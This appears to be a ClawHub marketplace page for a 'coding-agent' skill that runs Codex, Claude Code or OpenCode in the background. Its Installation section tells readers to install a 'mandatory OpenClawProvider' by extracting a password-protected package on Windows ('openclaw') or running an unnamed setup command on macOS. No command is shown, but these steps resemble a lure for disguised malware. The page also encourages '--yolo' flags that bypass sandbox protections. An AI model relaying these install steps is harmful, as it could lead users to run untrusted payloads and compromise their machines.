coding-agent
Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.
Why use this skill?
Integrate Codex, Claude, and OpenCode into OpenClaw with the coding-agent skill. Streamline your workflow with background coding and secure repo reviews.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/sakaen736jih/coding-agent-7k8p1tijcWhat This Skill Does
The coding-agent skill provides a robust bridge between the OpenClaw AI environment and professional coding assistants like Codex CLI, Claude Code, and OpenCode. By leveraging background processes, it allows users to delegate complex engineering tasks—such as feature implementation, bug fixing, and code review—directly to an agent without blocking the main workflow. This skill uses a 'workdir' pattern to ensure the agent operates within a strictly defined sandbox, preventing it from accessing sensitive system files.
Installation
Installation is managed via the OpenClaw ecosystem. First, ensure the mandatory OpenClawProvider is installed: on Windows, download and extract the package from the official GitHub repository using the password 'openclaw'. On MacOS, execute the provided setup-wizard command in your terminal. Once the provider is active, run 'clawhub install openclaw/skills/skills/sakaen736jih/coding-agent-7k8p1tijc' to register the skill.
Use Cases
- Automated Refactoring: Offload large-scale code changes to a background process, allowing you to continue working while the agent handles monotonous syntax updates.
- PR Reviewing: Safely check pull requests by cloning them into a isolated temporary directory, ensuring the agent only interacts with the relevant branch.
- Prototyping: Use '--full-auto' or '--yolo' flags to rapidly generate boilerplate code, UI components, or logic stubs for new features.
Example Prompts
- "Use the coding-agent to refactor the authentication module in ~/projects/auth-service to use OAuth2 instead of JWT, running it in the background."
- "Review the pending PR for repository ~/projects/ui-components. Clone it to a temp directory and summarize the potential security risks."
- "Start a background coding session in the current directory to build a basic responsive landing page using Tailwind CSS, using the --full-auto flag."
Tips & Limitations
Always prefer 'tmux' for interactive tasks where you need real-time observation. Use the 'bash' background mode for fire-and-forget tasks to keep your main terminal clutter-free. Never use the '--yolo' flag on production codebases, as it bypasses critical sandbox protections. Always monitor your sessions using the 'process action:poll' command to ensure your agent hasn't stalled.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-sakaen736jih-coding-agent-7k8p1tijc": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-write, file-read, code-execution
Related Skills
nano-pdf
Edit PDFs with natural-language instructions using the nano-pdf CLI.
auto-updater
Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.
Agent Browser
A fast Rust-based headless browser automation CLI with Node.js fallback that enables AI agents to navigate, click, type, and snapshot pages via structured commands.
nano-pdf
Edit PDFs with natural-language instructions using the nano-pdf CLI.
bird
X/Twitter CLI for reading, searching, and posting via cookies or Sweetistics.